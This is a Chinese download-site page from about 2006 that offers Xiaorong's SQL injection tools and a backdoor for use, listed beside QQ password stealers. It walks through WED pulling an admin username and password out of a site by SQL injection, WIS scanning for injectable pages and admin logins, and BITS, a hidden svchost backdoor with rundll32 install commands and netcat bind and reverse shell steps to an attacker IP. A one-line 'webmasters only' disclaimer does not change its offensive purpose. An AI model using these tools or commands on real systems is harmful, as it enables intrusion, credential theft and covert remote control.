下载首页 | 小游戏 | 麻将游戏 | QQ专区 | 网络安全 | 装机软件 | 下载分类 | 排 行 榜 | 最新更新 | 国外软件 | |
软件搜索: 分类 关键字
您的位置:下载首页应用软件黑客工具 → 小榕---SQL注入工具
 本类周下载排行
·QQ密码破解器 绿色版
·流光 Fluxay 5.0 免费版
·QQ密码远程暴力破解教程
·无敌QQ密码盗取器
·疯狂字典1.0
·超级字典生成器 V3.35(密码字典生成工具) 绿色特..
·QQ蜗牛暴力破解器+动画教程
·无线网络入侵工具
·完美QQ大盗QB无限制0828版
·菜鸟黑客必备工具箱 1.0
 本类月下载排行
·无敌QQ密码盗取器
·QQ密码破解器 绿色版
·小榕---SQL注入工具
·流光 Fluxay 5.0 免费版
·超级字典生成器 V3.35(密码字典生成工具) 绿色特..
·疯狂字典1.0
·QQ蜗牛暴力破解器+动画教程
·QQ密码远程暴力破解教程
·jiajia_Box V3.0((黑客工具箱) 绿色版
·QQ密码保护查询器
小榕---SQL注入工具
软件大小:128 KB
软件语言:简体中文
软件类别:国产软件 / 免费版 / 黑客工具
运行环境:Win2003, WinXP, Win2000, NT, WinME
添加时间:2006-5-7 12:28:17
更新时间:2006-5-7 12:38:30
软件评级:
会员级别:匿名用户
下载统计:本日:2 本周:13 本月:127 总计:5959
软件简介:
声明:
本工具仅仅提供站长监测网站漏洞使用,请不要用作其它用途.
工具包中总有两个小程序:"wed.exe"和"wis.exe",其中"wis.exe"是用来扫描某个站点中是否存在SQL注入漏洞的;"wed.exe"则是用来破解SQL注入用户名密码的。两个工具的使用都非常简单,结合起来,就可以完成从寻找注入点到注入攻击完成的整个过程。
[WED] 2004/08/29 

WED (Web Entry Detector),针对存在SQL Injection的网站对管理帐号进行扫描。 

Demo: 对通过WIS扫描出的存在SQL Injection漏洞的网站进行后台管理帐号扫描 

C:\>WED.exe http://www.someaspsite.com/shownews.asp?newsid=1544 

Web Entry Detector, Ver 1.0 by netXeyes, 2004/08/26 
http://www.netXeyes.com, security@vip.sina.com 

#### Phrase 0: Check Enviroment #### 
Get Row 1, Set Sensitive 250, Max Threads is 30 
File C:\TableName.dic Opened 
File C:\UserField.dic Opened 
File C:\PassField.dic Opened 

#### Phrase 1: Process Argv #### 
Host:www.someaspsite.com 
Page:/shownews.asp?newsid=1544 

#### Phrase 2: Detect SQL Injection #### 
SQL Injection Detected. 

#### Phrase 3: Get Cookies #### 
Tag: 2017 
Cookie: ASPSESSIONIDSADSBTAS=BIMAMMNCLCCIFICPLNEMFKND; path=/ 

#### Phrase 4: Starting Get Table Name #### 
Tag: 45 
Got Table Name is "users" 

#### Phrase 5: Starting Get Name Field #### 
Tag: 45 
Got Name Field is "name" 

#### Phrase 6: Starting Get Length of Field "name" #### 
Tag: 24 
Got Length of Field "name" is: 13 

#### Phrase 7: Starting Get Password Field #### 
Tag: 45 
Got Password Field is "pwd" 

#### Phrase 8: Starting Get Length of Field "pwd" #### 
Tag: 24 
Got Length of Field "pwd" is: 9 

#### Phrase 9: Starting Brute Field "name" and "pwd" (Access Mode) #### 

name is: administrator 
pwd is: admin@bvn 

C:\> 

到这一步,就可以通过WIS扫描获得的管理页面后台登陆了。 

[WIS] 2004/08/29 

WIS (Web Injection Scanner),自动对整个网站进行SQL Injection 脆弱性扫描,并且能够扫描后台登陆界面。 

Demo1: 扫描整个网站,找出存在SQL Injection的页面 

C:\>wis http://www.someaspsite.com/ 

Web Injection Scanner (Protype 0.4) 
by netXeyes, 2004.05.08 http://www.netXeyes.com security@vip.sina.com 
  

Scanning http://www.someaspsite.com/, Page: Unlimited 
Patient, Please.... 

(001 + 000) Checking: /shownews.asp?newsid=204 
SQL Injection Found: /shownews.asp?newsid=204 

Injection Page Final Result: 
============================ 
/shownews.asp?newsid=204 

C:\> 

Demo2: 扫描后台管理页面 

C:\>wis http://www.someaspsite.com/ /A 

Web Injection Scanner (Protype 0.4) 
by netXeyes, 2004.05.08 http://www.netXeyes.com security@vip.sina.com 

Scanning http://www.someaspsite.com/, Page: Unlimited, Detect Access Page 
Patient, Please.... 

(004 + 005) Access Page: /www.asp 
(004 + 006) Access Page: /wwwstats.asp 
(004 + 006) Access Page: /wwwlog.asp 
(004 + 006) Access Page: /wstats.asp 
(004 + 006) Access Page: /work.asp 
(005 + 007) Access Page: /webstats.asp 
(000 + 016) Access Page: /gansu2/tjhg.files/admin_index.asp 
(000 + 015) Access Page: /gansu2/tjhg.files/admin.asp 
(000 + 012) Access Page: /gansu2/gs.files/admin_index.asp 
(000 + 011) Access Page: /gansu2/gs.files/index_admin.asp 
(000 + 010) Access Page: /gansu2/tjhg.files/admin_del.asp 
(000 + 009) Access Page: /gansu2/ddddd.files/manage.asp 
(000 + 003) Access Page: /gansu2/ddddd.files/index_admin.asp 

Access Page Final Result: 
============================ 
/gansu2/login.asp (200 OK) 

Scan Finished 

C:\> 

[BITS] 2003/09/16 

BITS(Beat IT Security?),对商业的IT Security开始觉得厌倦了,So,Let's Beat IT Security :-)。 

BITS其实是Background Intelligent Transfer Service的缩写,让我们暂时借用这个服务和名字吧,因为BITS是一个冒名顶替的后门,也可以在不知不觉中实现另一种意义的Background Intelligent Transfer Service。 

这个后门是根据Bingle的关于svchost的原理写的,Thanks to Bingle。 

特点: 

进程管理器中看不到 

平时没有端口,只是在系统中充当卧底的角色 

提供正向连接和反向连接两种功能 

仅适用于Windows2000/XP/2003 

安装: 

在Administrators的权限下或者LocalSystem下: 

rundll32.exe BITS.dll,Install <Active Strings> 

Active Strings是用户自己指定的一个特征字符串,用于激活BITS。 

卸载: 
rundll32.exe BITS.dll,Uninstall 
重启系统 

通常情况下安装和卸载无论成功或者失败都不会有提示。 

正向连接: 

1、用nc连接目标主机的任何一个TCP端口(80/139/445.....) 
2、按照以下格式输入激活命令 
<Active Strings>@dancewithdolphin[xell]:<PORT> 
例如,在安装的时候设定了Active Strings为BITS Door,将CMD绑定在端口99: 
BITS Door@dancewithdolphin[xell]:99 

这样目标主机就会将CMD绑定在99。 
3、连接目标主机的指定端口(上例中为99) 

反向连接: 

很多情况下主机是在防火墙后面的,这样就需要用反向连接。 

1、在本地使用NC监听(如:nc -l -p 1234) 
2、用nc连接目标主机的任何一个防火墙允许的TCP端口(80/139/445.....) 
3、按照以下格式输入激活命令 
<Active Strings>@dancewithdolphin[rxell]:<Your IP>:<Listen Port> 
例如,在安装的时候设定了Active Strings为BITS Door,本机地址为1.1.1.1, nc在1234 
端口监听: 
BITS Door@dancewithdolphin[rxell]:1.1.1.1:1234 
4、目标主机的CMD将会出现在NC监听的端口1234。 

注意:所有的输入都区分大小写。 

Example: 

C:\My Documents>nc 219.237.63.199 139 
securitystrings@dancewithdolphin[xell]:7 


C:\My Documents>nc 219.237.63.199 7 
廙icrosoft Windows 2000 [Version 5.00.2195] 
(C) 版权所有 1985-2000 Microsoft Corp. 

C:\WINNT\system32> 

如果没有成功,可以尝试在安装的时候使用: 

rundll32.exe BITS.dll,Install rasauto <Active Strings>  
下载地址:

由此进入下载页面
注意事项:
·本站软件如果需要解压密码,请和站长联系。
·为了保证您快速的下载,推荐使用网际快车等专业工具下载。
·本站极其少数软件包含流氓软件安装程序,请安装时候多加注意!
·为确保所下软件能正常使用,请使用WinRAR v3.4或以上版本解压本站软件。
·所有软件全部本地连接,如果您发现该软件不能下载,请和管理员联系。
·站内影视内容,下载观看之后,请尽快删除,如果您觉的好,请通过正规渠道购买正版光盘。
·站内软件的破解版、破解补丁、注册机、注册码、注册版均由网上搜集,若无意中侵犯到您的权利,敬请来信联系我们。
站长推荐
操作系统
系统备份
杀毒软件
防火墙类
站长推荐
办公软件
翻译工具
下载工具
影音播放
站长推荐
网络聊天
图像处理
文字输入
木马查杀
站长推荐
压缩解压
系统优化
虚拟刻录
BT下载
 软件按字母排列:A - B - C - D - E - F - G - H - I - J - K - L - M - N - O - P - Q - R - S - T - U - V - W - X - Y - Z - 23 - @
 中文按声母排列:A1 - B - C - D - E - F - G - H - I - J - K - L - M - N - O - P - Q - R - S - T - U - V - W - X - Y - Z
版权所有 Copyright© 2001-2005 Www.Down117.Com, All Rights Reserved. 京ICP备05006012
联系QQ:107465434,E-mail:zywnet@126.com